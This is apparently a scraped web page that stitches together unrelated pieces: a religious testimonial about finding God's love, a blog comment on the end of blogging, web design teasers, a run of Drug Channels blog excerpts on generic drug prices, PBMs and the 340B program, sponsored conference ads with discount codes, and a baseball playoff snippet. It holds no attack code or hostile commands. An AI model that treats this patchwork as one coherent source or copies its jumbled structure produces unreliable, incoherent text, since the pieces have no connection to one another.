AS a teenager I felt very unloved. There seemed to be many reasons for this. I was told-often-that I wasn't pretty enough, or thin enough, to get a boyfriend. Well, I was desperate to change things. I followed the advice of television advertisements and magazine articles on how to be popular. I bought and used the soaps, creams, shampoos, and toothpastes that were supposed to result in instant popularity. I dieted, I worked out-I even considered plastic surgery, though I never went through with it. None of my efforts had any long-term effect. The harder I worked on myself, the more problems I found. It seemed as if no amount of money would fix what was wrong. What a relief it was to find out that there was a better way-an effective way-to find the love I craved. The first thing I needed to do was to find out what love is. Many people feel that love is abstract-so abstract that they do not know what it is or what it should be. We tend to think that love is just a good feeling that one human being brings to another. That would mean that to have love you first have to find someone to love you. I felt as if I'd done everything and still failed to find that ''someone.'' I didn't want to keep waiting-and filling the time with fantasies and chocolates-so I began to pray. I found out that I was already loved-by God! I didn't have to search for an elusive ''someone'' to love me; God's love was already pouring out on me. But it's more than that. God doesn't just love us; He is Love, divine Love. Mary Baker Eddy, who discovered Christian Science, points out in her book Science and Health with Key to the Scrip-tures: ''Spirit, Life, Truth, Love, com-bine as one,-and are the Scriptural names for God. All substance, intelligence, wisdom, being, immortality, cause, and effect belong to God. These are His attributes, the eternal manifestations of the infinite divine Principle, Love'' (p. 275). Since God is good and only good, His love brings freedom, joy, companionship, trust, honesty, purity, harmony, integrity. This is true love, and we already have it! The love I'd been working so hard to get from other people was mortal, finite, and conditional. A relationship based on that kind of love was subject to jealousy, dishonesty, infidelity, selfishness, inharmony, suspicion, and other unloving elements that would choke out the joy of the relationship. Divine Love is infinite, unconditional, freely given to all. God gives His love and guidance to every one of us, His children. He deems us worthy of His love because He made us that way; He made us spiritual, perfect, lovable! And our spiritual identity has nothing to do with having a certain body type, belonging to a certain ethnic group, or being at a particular socioeconomic level. When I began to accept God's love, when I accepted His Son, Jesus Christ, as the true expression of His love, I was able to accept myself as the perfect child of God. I was free and happy for the first time. I knew I was loved. When we acknowledge Jesus Christ as the living example of true love, we open the door to loving one another on a more reliable basis. The Bible states in First John: ''Let us love one another: for love is of God'' (4:7). Any conception of love outside of God is false. Jesus Christ, the Son of God, is man's example of God's love for His creation. Through Jesus we learn the true love that is spiritual and God-bestowed. We don't have to invent our own concept of love. The love of God is already ours to feel and express. And we can accept divine Love for ourselves and everyone else too. This is how we find the true love that is based on the true concept of God and man as found in the Bible. I am persuaded, that neither death, nor life . . . nor height, nor depth, nor any other creature, shall be able to separate us from the love of God, which is in Christ Jesus our Lord. Romans 8:38, 39

Become a part of the Monitor community


          Re: The End Of Blogging?        

Ironic, then, that I came here to read this because it popped up in my RSS reader ;) But then I'm old school like that as well.

I did, however, effectively put my blog out to pasture in 2013 then last year wrote a post a day over on Google+ as that's where I was and where my connections/readers were. It seemed to work.

I don't think the argument about needing to own your own house for "branding" purposes holds weight these days as social brands are just as (if not more) powerful but there is an inherent danger to writing in rented spaces (not that we expect the likes of Facebook to collapse any time soon) but it's not necessarily the danger we might always think.

In April this year I deleted my Google+ account after having been on board since day 3 of the closed beta. All those posts, all that content gone at the click of a button. From my perspective it's not so bad as all of last years posts were composed offline in a note app so not lost. What WAS lost, however, was the engagement around them, the conversation and the ideas that were spawned. This was highlighted to me by someone catching up on LinkedIn asking what happened as he wanted to refer back to some of his comments in work he was doing.

But, that same danger also exists with blogs as owners could take them down at any point - at least there is a safety net when the blog uses Disqus etc.


          4 Tips for Effective Web Design        

 Written by Travis Pryor, Digital Account Strategist

Great! You decided to upgrade your company website. You're investing time and money into the development process, and you want to make sure the final product is outstanding.


          Responsive Web Design        

 Written by Travis Pryor, Digital Account Strategist

 

I know what you’re thinking, it’s 2017 why are we still talking about responsive web design? That’s a good question. When was the last time you visited a website that was not responsive?


          Search Engine Optimization (SEO) Made Easy        

 Written by Robert Daugherty, Digital Marketing Intern

 â€œThe future of SEO is understanding and marketing to specific and defined audiences through search engines.”  -Adam Audette


          4 Essentials For A Successful Website Launch        

 Written by Robert Daugherty, Digital Marketing Intern


          Custom Web Design vs. Online Website Builder: Which is right for you?        

 Written by Robert Daugherty, Digital Marketing Intern

It looks like it’s finally time to redo the company website. You need a branded, professional, and functional website to suit your company needs. This website will serve as your digital billboard to the world; you want to get the job done right.


          Generic Deflation Roils the Channel—And Will Get Worse        
Deflation in generic drug prices dragged down second quarter earnings for drug wholesalers and generic manufacturers. Here’s a useful summary from The Wall Street Journal, which captures the grim marketplace realities in Falling U.S. Generic Drug Prices Hurt Manufacturers, Wholesalers. Yesterday, Mylan's earning release noted "high-single-digit erosion expected in North America."

Below, I review the state of the generic drug market. As you will see, the overall market for mature generic drugs is deflating by about 10% per year. Many generic drugs have dropped significantly in price over the past four years.

Surprisingly, the prices for about one in five generic drugs remain elevated. Scott Gottlieb, M.D., the new head of the Food and Drug Administration (FDA), has prioritized actions that should squeeze the remaining generic inflation out of the system. I expect generic drug deflation to continue—and possibly accelerate—over the next 12 to 24 months.

Payers and consumers will be the ultimate winners, but the drug channel faces significant disruption. In the meantime, let’s all hope that these price declines don’t trigger shortages if generic drug makers flee this sinking market.
Read more »
        

          Follow the Dollar Math: How Much Do Pharmacies, Wholesalers, and PBMs Make From a Prescription?        
Yesterday,The Wall Street Journal published an intriguing article by Jonathan Rockoff titled Behind the Push to Keep Higher-Priced EpiPen in Consumers’ Hands.

The article includes a graphic attributed to me (cited as Pembroke Consulting). It shows that the drug channel—pharmacy benefit managers (PBMs), wholesalers, and pharmacies—receive more than $37 in gross profit for a brand-name drug with a $300 list price. PBMs capture about half of this amount.

The WSJ article doesn’t describe how I arrived at the figures. But now you, Drug Channels reader, will get the inside scoop.

Below, I go inside the box and trace these crucial computations. They determine the revenues and profits of the drug channel participants that operate between a brand-name drug maker and the patient. I also reveal how the figures affect the net prescription cost for a third-party payer.

As with many things, you'll have to observe the system to figure out the superposition.
Read more »
        

          CBI’s PAP Legal Update        
CBI’s PAP Legal Update
September 25-26, 2017 | Arlington, VA
www.cbinet.com/PAPUpdate

PAP Legal Update 2017 - Please join the patient assistance and access community for this critical update meeting which will provide important insight into key legal issues, including recent advisory opinions from the OIG, developments in the changing healthcare and regulatory landscapes, and opportunities for industry collaboration in the face of an increased need for risk mitigation. Learn more here.

Compelling Discussions, Pivotal Insights and Interactive Sessions for Forward-Thinking Compliance
  • Hear an analysis of recent OIG advisory opinions related to PAPs
  • Examine the legal and enforcement environment impacting the relationships between manufacturers and 501(c)(3)s
  • Hear insights from advocates on efficient and effective PAPs and identify ways to strengthen your PAP with stakeholder engagement
  • Improve brand image and messaging for PAPs in the era of public scrutiny
  • Discuss policies for reducing risks associated with working with Medicare and Medicaid patients
  • Remain compliant with design and development of co-pay assistance programs
Download the complete agenda here. Visit www.cbinet.com/PAPUpdate for further details and to register. Drug Channels readers will save $300 off of the standard registration rate when they use code RKN333.*

*Cannot be combined with other offers or used towards a current registration. Cannot be combined with special category rate or non-profit rates. Other restrictions may apply.


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.
        

          What’s In, What’s Out: The New 2018 CVS Health and Express Scripts Formulary Exclusion Lists (Plus: A Sneak Peek From Prime)        
This week, the two largest pharmacy benefit managers (PBMs)—Express Scripts and the CVS/caremark business of CVS Health—released updates to their 2018 formulary exclusion lists. They are available below for your downloading pleasure.

For 2018, Express Scripts was more aggressive, expanding its list to 159 excluded products. At CVS Health, however, the total number of excluded remained steady. The Prime Therapeutics list won’t be available until September, but it will apparently exclude more drugs that either of its PBM peers.

Read on for my 2018 head-to-head comparison, including comments on inflammatory conditions, multiple sclerosis, epinephrine, biosimilars, and more. I also review the reported savings from formulary exclusions. I conclude with some questions about patients. Remember them?

If I have missed anything important, please comment below.
Read more »
        

          New Part B Buy-and-Bill Data: Physician Offices Are Losing to Hospital Outpatient Sites        
The Medicare Payment Advisory Commission (MedPAC), the independent agency that advises Congress on the Medicare program, recently released its June 2017 Data Book: Health Care Spending and the Medicare Program. The report is a 201-page wonktastic data dump. Chapter 10 focuses on prescription drugs.

In 2015, the most recent year available, Part B spending on drugs reached $25.7 billion. Hospital outpatient sites now constitute more than one-third of Medicare spending and have been crowding out physician offices. Part B payments to physician practices are growing much more slowly than payments to hospitals.

For some time, I have been tracking the evolution of the buy-and-bill system for provider-administered drugs. These new data confirm my predictions that physician offices’ will account for a declining share of the buy-and-bill market. Still unknown: Is this good or bad for patients?
Read more »
        

          CBI’s 5th Annual Coupon and Copay         
CBI’s 5th Annual Coupon and Copay
September 14-15, 2017 | Philadelphia, PA
www.cbinet.com/CouponAndCopay

Exclusive Offer – Register by 8/25/2017 and save $500*
Use discount code COUPDC

In the midst of a turbulent healthcare system, with drug prices continuing to escalate, patient affordability and access programs have become more critical than ever. Coupon and copay programs are one of the most effective tools for life sciences manufacturers to minimize patient out of pocket costs, while driving access and adherence.

As such, CBI's flagship Coupon and Copay conference, taking place September 14-15 in Philadelphia, PA, serves as the life sciences industry’s foremost event devoted exclusively to manufacturer-driven coupon and copay programs. Join the best of the best in life sciences and discover pioneering strategies to maximize ROI by leveraging these powerful discount opportunities.

The 2017 agenda boasts a diverse, experienced faculty from Otsuka Pharmaceuticals, United Healthcare Pharmacy, Healthwell Foundation, Coherus Biosciences, BioPlus Specialty Pharmacy, Community Health Network, UVA Cancer Center and many more!

Don't miss your chance to unite with leading innovators in copay design to discuss the future of patient assistance and access:
  • Hear multi-stakeholder perspectives on the future of assistance and access for patients needing high-cost specialty therapies
  • Discuss key analyses (abandonment, redemption, competitive offerings) used to improve the value of copay programs
  • Identify new challenges in an evolving environment including deductible reset, LOE, real-time measurement for launches, distribution channel, OIG risk, denial conversion and e-coupons
  • Navigate the OIG modifications on contributions to charitable patient programs
  • Learn more about copayment assistance funds for Medicare patients
  • Alignment of offer strategy with contracting efforts to avoid “double-dipping” of rebate and copay offerings
  • Consider strategies for fast tracking prior authorization and copay assistance for specialty prescriptions to increase speed to therapy

Register Today!

*Discount offer valid through 8/25/2017; applies to standard rates only and may not be combined with other offers, categories, promotions or applied to an existing registration.


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.

        

          Drug Channels News Roundup, July 2017: CVS, Anthem, Specialty Pharmacy, INSYS, and Big Box Pharmacy        
Cut through the steamy summer haze with our refreshing selection of articles and insights. In this issue:
  • CVS drugstores aim for a healthier look
  • Anthem dissects specialty pharmacy management
  • Takeaways from an Insys employee’s guilty plea over prior authorization
  • Profiling pharmacies inside supermarkets and mass merchants
Plus, The Onion reports on the launch of generic internets following patent loss. Scary!

P.S. Follow @DrugChannels on Twitter for my daily curated selection of news and commentary.
Read more »
        

          What Will Happen to Rite Aid’s Struggling EnvisionRx PBM?        
Let’s revisit the Walgreens Boots Alliance—Rite Aid deal. Instead of an acquisition, the revised transaction calls for Walgreens Boots Alliance (WBA) to buy 2,186 Rite Aid stores and three distribution centers for $5.2 billion. WBA will also pay a $325 million termination fee to Rite Aid.

If the deal receives regulatory approval, Rite Aid will shrink to a multi-regional pharmacy chain with about half as many stores. It will, however, hold onto EnvisionRx, the pharmacy benefit manager (PBM) that it acquired in 2015.

Unfortunately, EnvisionRx remains a small, struggling regional PBM with limited growth. Its revenues in 2017 have been declining. There also appears to be no material synergies between Rite Aid’s retail pharmacy business and its Envision PBM.

Last week, Rite Aid disclosed that it will use $4.9 billion of its $5.5 billion windfall to repay debt. (Pro forma financials below.) Given the performance troubles that I outline below, I wonder whether investors will trust the current management team to spend the cash wisely.
Read more »
        

          PBMI 2017 Specialty Rx Forum        
PBMI 2017 Specialty Rx Forum
September 12, 2017
Hyatt Regency Hotel | Downtown Chicago

You’re invited to join PBMI for its first regional Specialty Rx Forum in downtown Chicago at the Hyatt Regency Hotel. This one-day meeting is focused on discussing what's keeping plan sponsors up at night—specialty drug trend.

PBMI has gathered speakers representing different perspectives on the specialty drug industry including senior leaders from the largest PBMs, national employers, specialty drug manufacturers, and specialty pharmacies.

Check out the Agenda-at-a-Glance.

Register now!
Take advantage of lowest rates before they expire. Early bird rates end 8/1!

For more information about the Forum and sponsorship opportunities, please contact Linda DeChant at ldechant@pbmi.com.

PBMI looks forward to seeing you!


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.
        

          2016’s Top Retail Pharmacy Chains, According to Drug Store News        
Drug Store News (DSN) has just released its latest rundown of the top pharmacy retailers in the mightily-titled PoweRx 50. (Links below.)

I recommend the PoweRx list to anyone who competes with, sells to, or otherwise interacts with retail pharmacy chains. This useful resource also provides brief profiles of most organizations.

Below, I show DSN's top 25 retailers. This year, CVS Health tops the DSN list, with $60.8 billion in retail prescription sales. Colorado-based chain Pharmaca Integrative Pharmacy is no. 50, with $73 million in prescription sales—0.1% of CVS Health’s retail revenues.

Note that the DSN list is not a complete look at the U.S. pharmacy industry. It excludes many large mail and specialty pharmacies. It also inconsistently (and IMHO, inaccurately) aggregates independently-owned pharmacies by wholesaler and buying group. I highlight how the list differs from our broader but shorter list shown in The Top 15 U.S. Pharmacies of 2016.
Read more »
        

          Understanding CMS’s Surprising Reimbursement Cut for 340B Hospitals        
Last Thursday, the Centers for Medicare & Medicaid Services (CMS) shocked everyone with a proposal altering a small part of the 340B Drug Pricing Program. CMS proposed reducing reimbursement for certain Medicare Part B drugs purchased by 340B-eligible hospitals: from Average Sales Price (ASP) plus 6% to ASP minus 22.5%. Hospitals will also have to identify 340B claims with a new modifier.

Below, I highlight the most important 13 pages of CMS’s 664-page proposal. I also offer some observations and commentary on the proposal.

For context, I also include the new background memo for today’s House Energy and Commerce Committee hearing: Examining HRSA’s Oversight of the 340B Drug Pricing Program. The memo highlights the many negative findings from government watchdog agencies.

Like it or not, change may finally be coming to the out-of-control 340B program. Let’s hope Congress can get the program refocused on genuine safety-net providers and financially needy patients.
Read more »
        

          CBI’s Life Sciences Outcomes-Based Contracting Summit        
CBI’s Life Sciences Outcomes-Based Contracting Summit
October 3-4, 2017 | Philadelphia, PA
www.cbinet.com/OutcomesContracting

Exclusive Offer for Drug Channels Readers:
Register Now to SAVE $400* using promo code DCR400
Hurry! This Offer Expires August 14, 2017.

CBI’s 2nd Annual Life Sciences Outcomes-Based Contracting Summit provides critical strategies into the process of outlining, structuring and negotiating risk-sharing agreements between bio/pharma manufacturers and payers.

This timely event will address the continuous challenges the industry faces to lower drug costs and increase patient access, all while demonstrating the value of their drugs to insurers by providing best practices and key insights from thought-leaders regarding the nuances surrounding outcomes-based contracting.

Join us for Solutions-Oriented Sessions, Powerful Payer Insights and Illuminating Case Studies:
  • Gain an understanding of the risk-sharing challenges from the payers perspective, featuring Michael Sherman, MD, Sr. Vice President and Chief Medical Officer of Harvard Pilgrim Health Care
  • Bridge the gap between real-world evidence and health economics outcomes research
  • Manage legal, compliance and regulatory concerns surrounding value-based contracts
  • Examine the benefits and challenges of outcomes-based contracts for target population (orphan/rare disease) therapies
  • Translate successful European managed entry agreements into actionable opportunities for the U.S. marketplace
  • Discuss the challenges and rewards of co-developing drugs and diagnostics for enhanced outcomes
  • And more!
Be the first to view the complete agenda, then register today using promo code DCR400 for this limited time savings of $400* off.

*Discount offer valid through 8/14/17; applies to standard rates only and may not be combined with other offers, category rates, promotions or applied to existing registration. Offer not valid on workshops only or academic/non-profit registration.


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.

        

          10 Hospitals With 340B Contract Pharmacy Mega-Networks        
For a follow-up to The Booming 340B Contract Pharmacy Profits of Walgreens, CVS, Rite Aid, and Walmart, let’s examine covered entities’ contract pharmacy networks in the 340B Drug Pricing Program.

Many covered entities have relatively small 340B contract pharmacy networks. However, some have built large networks seemingly designed not to help needy and uninsured patients, but to enrich hospitals and pharmacies.

The top 10 hospitals, listed below, have built mega-networks averaging 277 pharmacies. The largest retail chains and pharmacy benefit managers (PBMs) are active participants in these networks. That’s right: PBMs have joined the 340B party!

Yesterday, the House Energy and Commerce Committee announced a July 18 hearing: Examining HRSA’s Oversight of the 340B Drug Pricing Program. Also below, I pose four questions that committee members should consider about 340B contract pharmacy mega-networks.
Read more »
        

          The Booming 340B Contract Pharmacy Profits of Walgreens, CVS, Rite Aid, and Walmart         
Pharmacies continue to ride the 340B Drug Pricing Program’s explosive growth.

Our latest exclusive analysis finds that nearly 20,000 pharmacy locations now act as a contract pharmacy for the hospitals and other healthcare providers that participate in the 340B Program. Fewer than 3,000 pharmacy locations were in the program in 2010.

Large retail pharmacy chains' rapid expansion (per the fourth chart below) into 340B suggests superior profits.
  • Six large chains account for two out of three 340B contract pharmacy locations in 2017. 
  • Walgreens remains the dominant participant, with nearly 6,400 locations in the 340B program. 
  • Over the past four years, CVS, Walmart, and Rite Aid have also deepened their engagement. These three chains collectively now have 5,400 340B contract pharmacy locations. 
Every year, I question the economics behind this astounding growth. How many prescriptions do contract pharmacies provide at discounted prices to uninsured, underinsured, and low-income patients? Are pharmacies engaged in profit-sharing agreements with 340B hospitals? Are they earning fees that far exceed fair market value standards? Who is really benefiting from the contract pharmacy boom?
Read more »
        

          Medicaid Drug Rebate Program Summit 2017        
Medicaid Drug Rebate Program Summit 2017
September 11-13, 2017
Marriott Magnificent Mile | Chicago
www.knect365.com/MDRP

Medicaid Drug Rebate Program Summit 2017 is a platform to:
  • Network with 600+ government officials, industry leaders, and pharma executives
  • Gain insights on the upcoming 340B Drug Ceiling Price and Civil Monetary Penalties Final Rules
  • Address the potential implications of “repeal and replace” on Medicaid
  • Hear lessons learned following the implementation of the AMP Final Rule
Register Now!
Use discount code XP2258DRUG for $200 off the current rate.

Earn CPE and CLE Credits!

A Universal Continuing Legal Credits (CLE) Certificate of Attendance will be applied for the State of Illinois. Continuing Professional Credits (CPE) will be provided in accordance with the National Association of State Boards of Accountancy (NASBA). State boards of accountancy have final authority on the acceptance of individual courses for CPE credit. All credits will be provided following the conclusion of the conference.

Get guidance from key federal officials to ensure compliance on government program mandates
  • Medicaid Reform in the Trump Era – Scott W. Atlas, MD, David and Joan Traitel Senior Fellow of the Hoover Institution, Stanford University; Member, Hoover Institution’s Working Group on Health Care Policy
  • MDRP: Once a Good Idea, Now Not “Good Enough” – Jeff Myers, President and Chief Executive Officer, Medicaid Health Plans of America
  • Part I: General Overview of the Medicaid Drug Rebate Program: History, Core Elements, and Manufacturer Requirements and Part II: Understand How to Calculate Critical Price Types Such as AMP, URA, Best Price, Base Line AMP – Miree Lee, Principal at M. Lee Consulting LLC
  • Authorized Generics Price Calculations – John Gould, Partner at Arnold & Porter Kaye Scholer LLP
  • Fireside Chat: External Counsel – Moderated by John Shakow, Partner at King & Spaulding, with KPMG, Arnold & Porter Kaye Scholer LLP, Sidley Austin, and Hogan Lovells
Download the Brochure Here for Full Agenda and Speaker Details

Get a Front Row Seat Today and Participate LIVE at the Event!
Register Now to SAVE $200 off the Current Rate. Use discount code XP2258DRUG.


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.

        

          What I Told HHS Secretary Tom Price About the 340B Drug Pricing Program (rerun)        
This week, I’m rerunning some popular posts while I'm on vacation. Click here to see the original post and comments from May 2017.

This post is especially timely given President Trump’s draft Executive Order. In Section 4, the Order directs Secretary Price to ensure that the program benefits "the lower income or otherwise vulnerable Americans for which the program was intended." Shortly after the article below was published, I discovered that the 340B program has been growing by more than 30% annually. (See The 340B Program Hits $16.2 Billion in 2016; Now 5% of U.S. Drug Market.) It's time to moderninze the 340B Drug Pricing Program.




Last Friday, I had the privilege of meeting with Secretary of Health and Human Services (HHS) Tom Price. I was invited to meet with Secretary Price for one of his listening sessions with industry experts and stakeholders. I appreciated the opportunity to share my perspectives.

In our meeting, I highlighted four ways that the 340B Drug Pricing Program is raising drug costs. I then offered eight specific recommendations for improving the program by addressing the widespread channel distortions the program has caused.

Read on for the recommendations and a summary of my comments to Dr. Price.

I have no idea if my suggestions will have any impact. Regardless, your friendly neighborhood blogger enjoyed spending time among some Washington insiders.
Read more »
        

          Cardinal Health’s Unhappy Profit Surprise: The Coevolution of Pharmacy Buying Groups and Wholesaler Economics (rerun)        
This week, I’m rerunning some popular posts while I'm on vacation. Click here to see the original post and comments from April 2017.



Yesterday probably didn’t turn out as well as Cardinal Health had expected.

The good news: The company announced the acquisition of Medtronic's Patient Care, Deep Vein Thrombosis and Nutritional Insufficiency businesses for $6.1 billion in cash.

The bad news: Cardinal sharply lowered its outlook for future profits from its pharmaceutical distribution business.

The company cited lower generic drugs prices and “sell-side" pressure from pharmacy customers as two primary causes of its financial woes. Wall Street was unhappy: Cardinal stock closed down a whopping 11%. McKesson and AmerisourceBergen stocks fell in sympathy.

Cardinal Health’s projected profit downturn illuminates a dilemma facing drug wholesalers:
  • Generic buying consortia of wholesalers and pharmacies have reduced wholesalers’ acquisition costs for generic drugs
  • Independent pharmacies—the most profitable customers of wholesalers—are successfully using their own buying groups to extract lower prices from wholesalers
Independent pharmacies have been backed into a corner—and have responded by pushing back against their wholesale suppliers. Cardinal’s warning highlights the coevolution of profits within the pharmacy channel ecosystem. Expect wholesalers to be increasingly desperate to make up these lost funds.
Read more »
        

          Five Fun Facts About the New Express Scripts-GoodRx Drug Discount Partnership (rerun)        
This week, I’m rerunning some popular posts while I'm on vacation. Click here to see the original post and comments from May 2017.



Last week, the pharmacy benefit manager (PBM) Express Scripts and the online discount card company GoodRx partnered on a new program called Inside Rx. The program provides point-of-sales discounts to uninsured patients on at least 40 brand-name drugs from eight manufacturers. Click here to read the press release.

This innovative partnership is the latest attempt to offer direct-to-consumer discounts that pop the gross-to-net bubble—at least for uninsured patients. Below, I delve deep inside Inside Rx. I explain:
  • How uninsured patients benefit
  • What’s in it for manufacturers, Express Scripts, and GoodRx
  • Which pharmacies are in the program’s narrow network
  • The surprises on the drug list
  • How inside Rx compares with CVS Health’s Reduced Rx program
Depending on your position in the drug channel, you will feel either joy, sadness, fear, disgust, or anger as this new program rolls out. Please feel free to emote in the comments below.
Read more »
        

          Partnering with IDNs BioPharma Strategy Summit        
Partnering with IDNs BioPharma Strategy Summit
August 16-17, 2017 | Philadelphia, PA
www.cbinet.com/IDNStrategy

As health systems continue to grow and consolidate to form major Integrated Delivery Networks (IDNs), manufacturers are tasked with learning how to best contract with, and sell to, these evolving systems to ensure product success.

With conflict of interest policies in place and restricted access to physicians, manufacturers are changing their sales approach to better reach and engage these new customers. CBI’s Partnering with IDNs Strategy Summit convenes manufacturers and IDNs to discuss how to create a mutually beneficial partnership that contributes to continual care coordination, strategic product management and enhanced access.

Drug Channels readers save $400 with discount code BHN554!

A Dialogue-Driven Forum Providing Next-Generation Approaches:
  • Forecast the 2- and 5-year outlook for IDNs and the overall healthcare ecosystem
  • Understand the impact of current biologic and biosimilar legislation and regulations on Healthcare Information Technology (HIT) used by integrated delivery networks
  • Gain insight into how drug choice impacts speed-to-fill and how specialty pharmacy stewardship affects patient outcomes
  • Choose the right partners for your brand and identify the key decision-makers
  • Learn how to overcome the challenges of limited access to physicians in certain networks
  • Discuss what becoming more “customer-centric” actually means for manufacturers
  • Hear best practices and opportunities for measuring success in the IDN channel

All New For 2017! – Five Expert Case Studies from IDNs:
  • Establishing the Partnerships with IDNs to Affect the Patient Journey and Outcomes
    • Jerry Buller, Director, Specialty Pharmacy Services, Vanderbilt University Medical Center
  • Optimize Patient Care through Integration and Collaboration
    • Scott Canfield, PharmD, Clinical Programs Manager, Specialty Pharmacy, Johns Hopkins Home Care Group
  • Gain Insights into Provider Care Coordination and Population Health Management
    • William T. Lee, D.Ph, MPA, FASCP, Pharmacy System Director, Carilion Clinic Healthcare System
  • From Diagnosis to Delivery – Disruptive Innovation in a Specialty Pharmacy
    • JoAnn Stubbings, BSPharm, MHCA, Assistant Director, Specialty Pharmacy Services, Ambulatory Care Pharmacy Department, University of Illinois at Chicago College of Pharmacy
REGISTER TODAY!

Visit www.cbinet.com/IDNStrategy for more information. Drug Channels readers will save $400 off the standard registration rate when they use code BHN554*

*Discount may not be combined with other offers, category rates, promotions, or applied towards an existing registration. Offer not valid on workshop only or academic/nonprofit registrations. Other restrictions may apply.


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.

        

          Observations on the New Walgreens Boots Alliance-Rite Aid Deal        
Yesterday we got some pre—July 4th fireworks.

Walgreens Boots Alliance (WBA) announced a deal to buy 2,186 Rite Aid stores and three distribution centers for $5.2 billion. Rite Aid will also get the option to source generic drugs via the wonderfully named Walgreens Boots Alliance Development (WBAD) organization. Click here to read the press release.

With a potential FTC battle looming, WBA made the debt-laden Rite Aid an offer that it couldn’t refuse.

Before you head off for the long holiday weekend, please enjoy these thoughts on the new transaction along with commentary on Fred’s and the drug wholesalers.
Read more »
        

          Drug Channels News Roundup, June 2017: Amazon, Whole Foods, 340B, DIR Fees, Provider-Sponsored Health Plans, and Kaiser        
Happy 241st birthday, America! Before you launch your July 4 festivities, please enjoy these Drug Channels fireworks:
  • My $0.02 on how Amazon-Whole Foods affects Amazon’s pharmacy ambitions
  • Congress starts to get serious about the 340B program
  • CMS finalizes reporting on pharmacy-related DIR fees
  • A reality check on provider-sponsored health plans
Plus, Kaiser provides a hilarious look at the hospital of the future…as seen from the 1950s!

P.S. Follow @DrugChannels on Twitter for my daily curated selection of news and commentary.
Read more »
        

          CBI’s 9th Hub and SPP Model Optimization        

CBI’s 9th Hub and SPP Model Optimization
September 26-27, 2017 | San Diego, CA
www.cbinet.com/HubsWest

Calling all manufacturers, specialty pharmacies, PBMs and hub service providers!

Head to San Diego this September to discuss the opportunities and challenges for swiftly moving data among all stakeholders to improve patient access and hub performance. Hear expert perspectives from Actelion Pharmaceuticals, Aegerion Pharmaceuticals, AssistRx, Churchill Pharmaceuticals, Horizon Pharma, Otsuka America Pharmaceutical, PharmaCord, Relypsa, Retrophin, Shire, TC Market Access and Welkin Health.

Drug Channels readers will save $400 off the standard registration rate
when they use discount code HUT465.*

Capitalize on effective strategies to improve hub operations:
  • Optimize the use of field reimbursement managers and data sharing with hubs
  • Design hubs to best measure the right data points and transfer data across multiple organizations (Hub data, manufacturer leadership, contract management team, IT account specialists) for swift implementation
  • Gain best practices to eliminate consuming workflows for the hub
  • Identify how to improve information exchange between Hubs and specialty pharmacies
  • Enhance the hub to propel product success and patient access
  • Align channel and hub strategies to maximize efficiency
Download the complete agenda here, and visit www.cbinet.com/HubsWest for further details and to register. Drug Channels readers will save $400 off of the standard registration rate when they use discount code HUT465.*

*Cannot be combined with other offers or used towards a current registration. Cannot be combined with special category rate or non-profit rates. Other restrictions may apply.


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.

        

          Insider Tips to Help Meet Patient Management Standards in URAC’s Specialty Pharmacy v3.0 Accreditation         
Today’s guest post comes from Russel Allinson, co-founder, Chief Executive Officer, and Chief Clinical Officer of Therigy.

Russ discusses the importance of understanding the latest URAC Specialty Pharmacy v3.0 accreditation requirements, particularly relating to patient management. To learn more, register for a free webinar co-hosted by Therigy and Cleveland Clinic. The webinar will be held on July 11, 2017, at 1:00 p.m. EDT.

Read on for Russ's insights.
Read more »
        

          Profits in the 2017 Fortune 500: Manufacturers vs. Wholesalers, PBMs, and Pharmacies        
Time for my annual review of the Fortune 500 list. Every year, this is one of my most popular posts, because it helps us “follow the dollar” and understand how drug channel intermediaries make money.

The 2017 list contains the same seven drug channel companies that the 2016 list did: AmerisourceBergen, Cardinal Health, CVS Health, Express Scripts, McKesson, Rite Aid, and Walgreens Boots Alliance.

Using the Fortune data, I explore the profitability and shareholder returns of the largest public drug wholesalers, chain pharmacies, and pharmacy benefit managers (PBMs). I compare these companies with the Fortune 500’s ten pharmaceutical manufacturers and a separate survey of independent pharmacies.

The Fortune data remind us that many multi-billion dollar businesses profit as drugs move through the U.S. reimbursement and distribution system. We must recognize this complex system in order to tackle the price and affordability of drugs.
Read more »
        

          CBI’s Specialty Pharmacy Network Design Summit        
Specialty Pharmacy Network Design Summit
August 17-18, 2017 | Philadelphia, PA
www.cbinet.com/specialtynetwork

Mark your calendar for August 17-18, 2017 and attend the Specialty Pharmacy Network Design Summit in Philadelphia!

Learn about the latest strategies to optimize specialty pharmacy networks, the role of data shaping the future of specialty pharmacy, and specialty drug pricing/contracting trends. This meeting focuses on all aspects of specialty pharmacy network design from a multi-stakeholder approach providing the ideal platform to discuss opportunities and decision-making criteria behind building and expanding your specialty drug networks.

Drug Channels readers will save $400 off of the standard registration rate when they use discount code MXZ956.*

Agenda Sneak Peek:
  • Explore the Specialty Network Design Decision-Making Process – Critical Criteria to Consider for Network Design Success
  • Patient Data Aggregation, Reporting and Interpretation Methods for Manufacturers to Better Understand the Complete Patient Journey
  • Evaluate the Emerging Trend of IDNs/ACOs Role in Specialty Pharmacy – Network Design Strategies Tailored for IDNs/ACOs Partnerships
  • Making the Connection with the Patient - Specialty Pharmacy Services Strategies, Consent Compliance and the Impact on Patient Access
  • Utilizing Innovative Health Information Technology to Transform Network Design
  • Specialty Pharmacy Oncology Case Study
  • Interactive Scenario Planning – Discover the Best Network Design to Achieve Your Goals
Sign up to receive the complete agenda here, and visit www.cbinet.com/specialtynetwork for further details and to register. Drug Channels readers will save $400 off of the standard registration rate when they use discount code MXZ956.*

 CBI will see you there!

 *Cannot be combined with other offers or used towards a current registration. Cannot be combined with special category rate or non-profit rates. Other restrictions may apply.


The content of Sponsored Posts does not necessarily reflect the views of Pembroke Consulting, Inc., Drug Channels, or any of its employees.

        

          Late rallies, unsung heroes featured in weekend playoff action         

This year's league championship series have already produced all the elements of high baseball drama -- great pitching, clutch hitting, incredible last-gasp comebacks, and a succession of ``little guys'' stealing the spotlight from their better-known peers. And some of the most exciting moments may still be to come as the two best-of-seven series now return to Boston and Houston for their final chapters.

